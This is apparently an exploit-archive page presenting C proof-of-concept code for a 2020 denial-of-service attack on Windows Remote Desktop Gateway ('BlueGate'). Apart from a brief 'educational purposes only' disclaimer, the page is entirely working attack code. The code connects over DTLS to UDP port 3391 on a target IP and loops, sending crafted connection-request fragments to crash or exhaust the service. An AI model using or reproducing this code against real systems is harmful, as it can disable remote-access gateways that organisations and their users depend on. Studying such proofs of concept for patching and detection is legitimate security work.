Remote desktop gateway bluegate denial of service (poc) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-01-23 |
Type : dos |
Platform : windows
This exploit / vulnerability Remote desktop gateway bluegate denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#include "BlueGate.h"
/*
EDB Note:
- Download (Source) ~
- Download (Binary) ~
*/
void error(const char* msg)
{
printf("ERROR: %s\n", msg);
exit(EXIT_FAILURE);
}
void SOCKInit()
{
WSADATA wsaData;
int res;
res = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (res != 0)
error("WSAStartup failed");
}
void DTLSInit()
{
SSL_library_init();
SSL_load_error_strings();
ERR_load_BIO_strings();
OpenSSL_add_all_algorithms();
}
int OpenUDPConnection(const char* hostname, int port)
{
int sockfd;
sockaddr_in addr;
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd < 0)
error("Failed to open socket");
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
inet_pton(AF_INET, hostname, &(addr.sin_addr));
if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0)
{
closesocket(sockfd);
error("Failed to connect socket");
}
return sockfd;
}
SSL* DTLSConnection(const char* hostname)
{
int sockfd;
int result;
DTLSParams client;
sockfd = OpenUDPConnection(hostname, 3391);
client.ctx = SSL_CTX_new(DTLS_client_method());
client.bio = BIO_new_ssl_connect(client.ctx);
BIO_set_conn_hostname(client.bio, hostname);
BIO_get_ssl(client.bio, &(client.ssl));
SSL_set_connect_state(client.ssl);
SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY);
SSL_set_fd(client.ssl, sockfd);
if (SSL_connect(client.ssl) != 1) {
return NULL;
}
return client.ssl;
}
int send_dos_packet(SSL* ssl, int id) {
CONNECT_PKT_FRAGMENT packet;
packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT;
packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER);
packet.usFragmentID = id;
packet.usNoOfFragments = id;
packet.cbFragmentLength = 1000;
memset(packet.fragment, 0x41, 1000);
char pkt[sizeof(packet)];
memcpy(&pkt, &packet, sizeof(packet));
return SSL_write(ssl, pkt, sizeof(pkt));
}
int main(int argc, char* argv[])
{
SSL* ssl;
int i = 0;
char* hostname;
if (argc != 2) {
printf("Usage: %s <IP address>\n", argv[0]);
return 0;
}
hostname = argv[1];
SOCKInit();
DTLSInit();
while (i++ > -1) {
ssl = DTLSConnection(hostname);
if (ssl == NULL) {
break;
}
for (int n = 0; n < 4; n++) {
send_dos_packet(ssl, i+n);
printf("Sending packet [%u]\n", i + n);
}
i++;
}
return 0;
}